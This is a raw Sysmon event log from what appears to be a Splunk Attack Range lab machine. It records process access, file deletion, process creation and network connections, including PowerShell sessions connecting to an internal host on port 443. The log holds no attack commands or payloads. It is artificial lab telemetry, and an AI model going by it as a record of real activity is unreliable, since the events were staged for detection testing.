15:03:31.072{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-73C3-613B-50B4-03000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73C3-613B-50B4-03000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.067{B81B27B7-73C3-613B-50B4-03000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.686{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2DF9AF2874F1061E16832306C196379,SHA256=1BD1BCCC98D62292BEAE8126B0A7D170B7BBBEEFA3B558FC579BBAA8630D3159,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73C4-613B-52B4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-73C4-613B-52B4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.271{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73C4-613B-52B4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.266{B81B27B7-73C4-613B-52B4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AF92276DD2F9A0926E2F20428C309AC,SHA256=E91F74A0054BA2EAFA9E9C218D0DCC8759C4DEAAC69148BD574841F98A08ECD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9B0C643D887B3D00CD1514F94E99DE4,SHA256=F310A9BA9B3219826A344AAFAA6953A9D6F6D7F456DB55E47F85EAAF88B79FAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:33.701{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8873E9BE8F8D6E0BDC7455BD6E93567C,SHA256=8FFD5A514C8761B66BF4DD4341DC8289F9F04408046F4DA024AB9134E071621D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:59.007{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52521-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:33.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AF92276DD2F9A0926E2F20428C309AC,SHA256=E91F74A0054BA2EAFA9E9C218D0DCC8759C4DEAAC69148BD574841F98A08ECD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:33.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=657D2351ABA814839A1DE1290278A142,SHA256=B91FF2B87C733AD04EE0132396F6C77F3FEEFEAC6AB482F30BE4356C7FCA0106,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:34.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E5923F76FA0B291865674E835402E3,SHA256=1906E5DDE61B5BFB562EC48757C35B0DFF50F41CDFC1D65C5A8E08D14C0A56BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:35.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B54395F8DF6F74F59C911AE6B13B9E,SHA256=1CDBD4A3C732FA78A4443DDB03FA56ACE5E0491ADE38C2440266E005B5C07168,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:00.171{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52522-false10.0.1.12-8000- 23542300x800000000000000035343223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:36.754{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEB935E58E600DE71220147889B7ACA4,SHA256=0C1E7DB4E5E8F2A1F221F6DF5622471A74E93E555FD95C682D249FEF3BCD4DAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:36.592{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75fa7940.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:37.775{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=906B9F6E8A80325F6A886BBF1129A2E6,SHA256=EAE89C59722543C5AF3F43A824F9AA5B2B16CE36EFFF0D0EF96704E4378B22FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:38.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D2462A5AA2B51278EAE8C41FD8A5A32,SHA256=37E4ECE3E02C40AAED8ABF1490FB5BE55B5060B71396D1C7F2972664E333E3BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:39.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AADFC2D366FFAE8EF2213E4B7305723,SHA256=9B73835741DFDA01A8E2B52452A4055D226EB99E95A3AA95758D3DB361BC0670,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:39.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEEEE2AE1965242F994D6AADCE2A59A2,SHA256=71198BFA3B415A021F0B657E5A6C62C6C031A866BFF27B054A8F885F34ED6BFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:40.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345ECAD13D2C2AC70C9BED563AA77F1C,SHA256=0FBC3B744120EAFE3694062989C01FFE6F700808184B167A131B30B958134BFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:06.071{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52524-false10.0.1.12-8000- 354300x800000000000000035343228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:05.010{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52523-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:41.886{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30858BBAD812442BC7F8B0B3237B55D1,SHA256=AC651F024943C75095B3D365BAFC8827A7896F0C456B485B97DE98D8FA86B8F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:42.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDE3248B194663FA024B4A21D543CA5,SHA256=7B2E162B9FDB6E7CC90830BA1C9F3362A912B3ECE1368066CC0EC145A4B49BA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:43.948{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66126B2A69E5710D354CB3ABBF5E1EAD,SHA256=0CE616D163F1912848DDF326DFE5CAB0A4CF12FE35AFD79B82DF15CBA94ECC34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:44.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25684CB9A1158C09A1F06D04D13FD69C,SHA256=8FE15089B9F1A9A320D7E335045296495CC9104568620491484792CA8570CCB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:44.899{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FAB12EE89EE1368BFBCF32C9F6E9FE4B,SHA256=28D01C9E95883A90D4C226C60DC6D16D27CDD41FDF37C764E325F5F51495B96E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 